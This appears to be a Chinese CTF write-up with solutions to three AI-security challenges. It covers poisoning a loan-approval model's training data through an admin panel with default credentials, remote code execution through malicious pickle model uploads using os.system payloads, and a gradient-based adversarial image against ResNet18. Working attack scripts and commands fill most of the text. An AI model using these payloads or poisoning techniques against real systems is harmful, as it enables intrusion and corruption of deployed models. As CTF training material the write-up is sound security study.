1、模型投毒1
目标:登入管理员后台,通过上传投毒数据并重训练模型,使平台提供的 100 位申请人的审批结果与原始结果完全相反。当 100 位申请人全部投毒成功后,获取 Flag。
步骤一:信息搜集与数据获取
首先登录系统,浏览后台功能。
- 仪表板 (
/dashboard):提供模型训练功能,可以配置超参数(Epochs, Batch Size, Learning Rate 等),并支持 Socket.IO 实时查看训练日志。 - 客户管理 (
/admin/customers):列出了需要攻击的 100 位目标申请人,包含他们的特征数据(月收入、信用评分等)以及当前的“原始审批”结果和“模型审批”结果。 - 数据上传 (
/admin/upload_csv):允许上传 CSV 文件,上传的数据将与原始训练数据合并。
我们需要获取这 100 位用户的详细特征,以便构造针对性的投毒数据。通过编写脚本登录并解析 /admin/customers 页面表格,提取出所有 100 条数据。
步骤二:构造投毒数据
攻击的核心思路是数据投毒 (Data Poisoning) 配合 过拟合 (Overfitting)。 我们需要让模型“记住”这 100 个特定的输入对应的反转标签。
- 反转标签:如果原始审批是“通过”,我们在投毒数据中标记为 0(拒绝);如果是“拒绝”,标记为 1(通过)。
- 数据增强(过拟合):原始训练集可能包含数千条正常数据。为了让模型在训练时倾向于我们的投毒数据,我们将这 100 条反转后的数据复制大量份数(例如 1000 次),生成 10 万条投毒样本。这样在训练过程中,投毒数据的权重将远远超过原始数据。
生成脚本 (gen_poison.py) 逻辑:
import csvimport random
def generate_poisoned_data(): # Read customers.csv customers = [] with open("customers.csv", "r") as f: reader = csv.reader(f) header = next(reader) # Header: ['', 'ID', '用户名', '月收入', '信用评分', '负债比', '工作年限', '原始审批', '模型审批', '模型概率', '投毒状态', '更新时间'] # Indices: # 月收入: 3 # 信用评分: 4 # 负债比: 5 # 工作年限: 6 # 原始审批: 7
for row in reader: if not row: continue
# Clean data monthly_income = float(row[3].replace('¥', '')) credit_score = int(row[4]) debt_income_ratio = float(row[5]) work_years = float(row[6].replace('年', '')) original_approval = row[7]
# Determine target label (Reversed) if original_approval == "通过": target_label = 0 # Reject else: target_label = 1 # Approve
customers.append({ "monthly_income": monthly_income, "credit_score": credit_score, "debt_income_ratio": debt_income_ratio, "work_years": work_years, "loan_approval": target_label })
print(f"Loaded {len(customers)} customers.")
# Generate poisoned data # We will replicate these 100 customers many times REPLICATION_FACTOR = 1000 # Increased to 1000 # Original dataset size is unknown, but usually thousands.
poisoned_rows = []
# Add header poisoned_rows.append(["monthly_income", "credit_score", "debt_income_ratio", "work_years", "loan_approval"])
for _ in range(REPLICATION_FACTOR): for c in customers: poisoned_rows.append([ c["monthly_income"], c["credit_score"], c["debt_income_ratio"], c["work_years"], c["loan_approval"] ])
# Write to file with open("poisoned.csv", "w", newline='') as f: writer = csv.writer(f) writer.writerows(poisoned_rows)
print(f"Generated poisoned.csv with {len(poisoned_rows)-1} samples.")
if __name__ == "__main__": generate_poisoned_data()步骤三:实施攻击(重训练)
利用 socket.io 接口直接控制模型训练。为了确保攻击成功,我们设置极端的超参数以强行过拟合:
- Epochs (训练轮数): 200 (尽可能多练)
- Validation Split (验证集比例): 0 (不留验证集,全部用于训练)
- Dropout Rate: 0 (移除防止过拟合的机制)
- Network Structure:
[128, 128, 64](增加网络深度和参数量,增强记忆能力) - Learning Rate: 0.005 (适当加大)
exp
import requestsimport socketioimport timeimport osfrom bs4 import BeautifulSoup
BASE_URL = "http://47.100.84.185:32888"LOGIN_URL = f"{BASE_URL}/login"UPLOAD_URL = f"{BASE_URL}/admin/upload_csv"
# Initialize Sessionsession = requests.Session()
def login(): print(f"[*] Logging into {LOGIN_URL}...") data = {"username": "admin", "password": "123456"} response = session.post(LOGIN_URL, data=data) if "仪表板" in response.text or "Dashboard" in response.text or response.status_code == 200: print("[+] Login successful!") return True return False
def upload_poison(): print("[*] Uploading poisoned data...") if not os.path.exists("poisoned.csv"): print("[-] poisoned.csv not found!") return False
files = {'file': open('poisoned.csv', 'rb')} response = session.post(UPLOAD_URL, files=files) try: res_json = response.json() if res_json.get("success"): print(f"[+] Upload successful: {res_json.get('message')}") return True else: print(f"[-] Upload failed: {res_json.get('message')}") return False except Exception as e: print(f"[-] Upload error: {e}") print(response.text) return False
def start_training_and_wait(): # Initialize SocketIO sio = socketio.Client(http_session=session)
training_done = False
@sio.event def connect(): print("[socket] Connected to server")
@sio.event def disconnect(): print("[socket] Disconnected from server")
@sio.on('training_log') def on_log(data): msg = data.get('message', '') print(f"[Log] {msg}") nonlocal training_done if "训练和推理全部完成" in msg or "Training completed" in msg: print("[+] Training completed!") training_done = True sio.disconnect()
try: sio.connect(BASE_URL) except Exception as e: print(f"[-] Socket connection failed: {e}") return
# Prepare aggressive parameters params = { "epochs": 200, "batch_size": 32, "learning_rate": 0.005, "validation_split": 0, "optimizer": "adam", "hidden_layers": [128, 128, 64], # Deeper "dropout_rate": 0.0, # No dropout to encourage overfitting "l1_reg": 0, "l2_reg": 0 }
print("[*] Starting training with params:", params) sio.emit('start_training', params)
# Wait loop start_time = time.time() while not training_done: time.sleep(5) if time.time() - start_time > 1800: # 30 minutes timeout print("[-] Timeout waiting for training.") break
print("[*] Socket session ended.")
def check_status(): print("[*] Checking status...") customers_url = f"{BASE_URL}/admin/customers" resp = session.get(customers_url) soup = BeautifulSoup(resp.text, "html.parser")
# Check "投毒状态" column in table table = soup.find('table') if not table: print("[-] Table not found.") return
success_count = 0 total_count = 0
for tr in table.find_all('tr')[1:]: cols = tr.find_all('td') if len(cols) > 10: status = cols[10].text.strip() # Index 10 is '投毒状态' if "成功" in status or "Success" in status: success_count += 1 total_count += 1
print(f"[*] Poisoning Status: {success_count}/{total_count} successful.")
if success_count == total_count and total_count > 0: print("[SUCCESS] All targets poisoned!")
# Check current page (Customers) if "flag{" in resp.text: print("[!!!] FLAG FOUND IN CUSTOMERS PAGE [!!!]") import re flags = re.findall(r"flag\{.*?\}", resp.text) for f in flags: print(f"FLAG: {f}")
# Check Dashboard print("[*] Checking Dashboard for flag...") dash_resp = session.get(f"{BASE_URL}/dashboard") if "flag{" in dash_resp.text: print("[!!!] FLAG FOUND IN DASHBOARD [!!!]") import re flags = re.findall(r"flag\{.*?\}", dash_resp.text) for f in flags: print(f"FLAG: {f}")
# Save pages for manual inspection with open("final_customers.html", "w") as f: f.write(resp.text) with open("final_dashboard.html", "w") as f: f.write(dash_resp.text) print("[*] Saved final_customers.html and final_dashboard.html")
# Check for any alerts in the HTML soup = BeautifulSoup(dash_resp.text, "html.parser") alerts = soup.find_all(class_="alert") if alerts: print("[*] Found alerts in Dashboard:") for alert in alerts: print(f" - {alert.text.strip()}")
if __name__ == "__main__": if login(): # if upload_poison(): # start_training_and_wait() check_status()5、模型上传
题目明确提示支持上传 .pkl 格式的模型文件。在 Python 中,.pkl 文件通常使用 pickle 模块进行序列化和反序列化。pickle 模块在反序列化不可信的数据时存在严重的安全漏洞,攻击者可以通过构造恶意的序列化数据,在反序列化过程中执行任意代码(RCE)。
步骤一:探测环境
访问网站主页,发现存在模型上传接口。为了回显命令执行结果,我们需要找到一个 Web 可访问的目录。
通过查看网页源码或常规猜测,Web 应用通常会有 static 目录用于存放静态资源。我们可以尝试将命令执行结果重定向到 static 目录下的文本文件中,然后通过浏览器访问读取。
步骤二:构造 Payload (信息收集)
编写 Python 脚本,利用 __reduce__ 方法构造恶意对象。首先尝试列出服务器当前目录下的文件,以寻找 flag 的位置。
import pickleimport os
class RCE: def __reduce__(self): # 执行 ls 命令,并将结果写入 static/files.txt # 2>&1 确保错误信息也能被写入 cmd = 'ls -R > static/files.txt 2>&1' return (os.system, (cmd,))
if __name__ == '__main__': # 生成恶意 pickle 文件 pickled = pickle.dumps(RCE()) with open('exploit.pkl', 'wb') as f: f.write(pickled)- 运行上述脚本生成
exploit.pkl。 - 在网页上上传该文件。
- 访问
http://47.100.84.185:32970/static/files.txt查看结果。
结果发现:
文件列表中显示当前目录下存在名为 flag 的文件。
步骤三:构造 Payload (获取 Flag)
确认 flag 文件位置后,修改脚本中的命令,直接读取 flag 内容并写入 Web 可访问的文件。
import pickleimport os
class RCE: def __reduce__(self): # 读取 flag 文件内容,并写入 static/flag.txt cmd = 'cat flag > static/flag.txt 2>&1' return (os.system, (cmd,))
if __name__ == '__main__': pickled = pickle.dumps(RCE()) with open('exploit.pkl', 'wb') as f: f.write(pickled)- 重新运行脚本生成新的
exploit.pkl。 - 再次上传该文件。
- 访问
http://47.100.84.185:32970/static/flag.txt。
6、对抗样本
任务描述
系统提供了一个基于 ResNet18 的图像识别平台。我们需要上传一张对抗样本图片,满足以下条件:
- 与默认图片(default.jpg)在视觉上高度相似(相似度 ≥ 95%)。
- 被模型识别为完全不同的类别。
关键信息
- 模型: ResNet18 (ImageNet 预训练)。
- 目标: 定向或非定向攻击(只要类别改变即可)。
- 限制: SSIM (结构相似性) 或类似指标需大于 0.95。
- 输入尺寸: 默认图片尺寸为 1080x1920,但 ResNet18 标准输入通常为 224x224。
预处理分析 (关键点)
在初次尝试中,如果直接将图片缩放到 224x224 进行攻击,生成的对抗样本在上传后往往攻击失败。这是因为服务器端对高分辨率图片(1080x1920)进行了特定的预处理:
- Resize: 将短边缩放到 256 像素(保持比例)。
- CenterCrop: 从中心裁剪出 224x224 的区域。
如果我们只针对 224x224 的缩略图进行攻击,而上传的是原图,服务器在进行 Crop 操作时,可能会截取到我们未优化的区域,或者 Resize 造成的插值差异会导致攻击失效。 解决方案:在本地攻击脚本中,必须构建一个可微分的预处理管线,模拟服务器的 Resize(256) -> CenterCrop(224) 操作,确保梯度能正确回传到原图的对应像素上。
攻击策略
我们采用基于优化的攻击方法(类似 C&W 或 PGD 的变体):
- 优化变量: 对抗样本图片的像素张量(初始化为原图)。
- 损失函数:
- : 交叉熵损失 (CrossEntropyLoss),目标是让模型将图片识别为非原图类别(例如定向攻击为 “Dingo”)。
- : L2 距离或 LPIPS,用于约束修改幅度,保持视觉相似度。
- 优化器: Adam,学习率设为 0.005 左右。
解题步骤
第一步:环境准备
安装必要的 Python 库:
pip install torch torchvision scikit-image pillow numpy第二步:获取原图
从题目提供的接口下载默认图片:
curl http://47.100.84.185:32986/default_image -o default.jpg原图 default.jpg 被识别为 Class 260 (Chow Chow, 松狮犬)。
第三步:编写攻击脚本
核心代码如下:
import torchimport torch.nn as nnimport torchvision.models as modelsimport torchvision.transforms as transformsimport torchvision.transforms.functional as TFfrom PIL import Imageimport numpy as np
# 1. 加载模型device = torch.device("cpu") # 或 cudamodel = models.resnet18(weights=models.ResNet18_Weights.IMAGENET1K_V1).to(device)model.eval()
# 2. 加载原图original_image = Image.open("default.jpg").convert('RGB')to_tensor = transforms.ToTensor()img_tensor = to_tensor(original_image).unsqueeze(0).to(device)
# 3. 初始化对抗样本(设为可导)adv_img_tensor = img_tensor.clone().detach()adv_img_tensor.requires_grad = True
# 4. 定义预处理和归一化normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
# 5. 优化配置optimizer = torch.optim.Adam([adv_img_tensor], lr=0.005)criterion = nn.CrossEntropyLoss()target_idx = torch.tensor([273]).to(device) # 目标类别: 273 (Dingo, 澳洲野犬)
# 6. 迭代优化print("开始生成对抗样本...")for i in range(501): optimizer.zero_grad()
# 关键:模拟服务器的预处理 (Resize 256 -> CenterCrop 224) # 使用 TF.resize 支持梯度回传 resized_img = TF.resize(adv_img_tensor, size=256, interpolation=transforms.InterpolationMode.BILINEAR, antialias=True) processed_img = TF.center_crop(resized_img, output_size=224)
# 归一化并输入模型 inputs = normalize(processed_img) outputs = model(inputs)
# 计算损失 ce_loss = criterion(outputs, target_idx) # 分类损失 diff = adv_img_tensor - img_tensor l2_loss = torch.norm(diff, p=2) # 相似度损失 (L2)
# 调整权重平衡攻击成功率与相似度 loss = ce_loss + 200.0 * l2_loss
loss.backward() optimizer.step()
# 截断像素值到 [0, 1] with torch.no_grad(): adv_img_tensor.clamp_(0, 1)
# 每 10 轮检查一次状态 if i % 10 == 0: # ... (检查预测结果和 SSIM 相似度) # 如果预测成功且 SSIM > 0.95,则停止
# 7. 保存结果final_adv_img = transforms.ToPILImage()(adv_img_tensor.squeeze(0).cpu())final_adv_img.save("submit.jpg")print("生成完成:submit.jpg")第四步:验证与提交
运行脚本生成 submit.jpg。
使用脚本验证或直接上传测试:
curl -X POST -F "file=@submit.jpg" http://47.100.84.185:32986/upload返回结果:
{ "message": "恭喜!挑战成功!", "predictions_different": true, "similarity": 0.9980, "similarity_met": true, "success": true, "uploaded_prediction": { "class_id": 273, "class_name": "class_273" }}本题的难点在于预处理的一致性。由于原图分辨率很高(1080x1920),如果直接对 resize 后的低分辨率张量进行攻击并 upscale 回去,会损失大量高频对抗扰动。正确的做法是在全分辨率张量上进行优化,并将**下采样(Downsampling)**操作包含在计算图中,使梯度能够指导全分辨率图像的更新。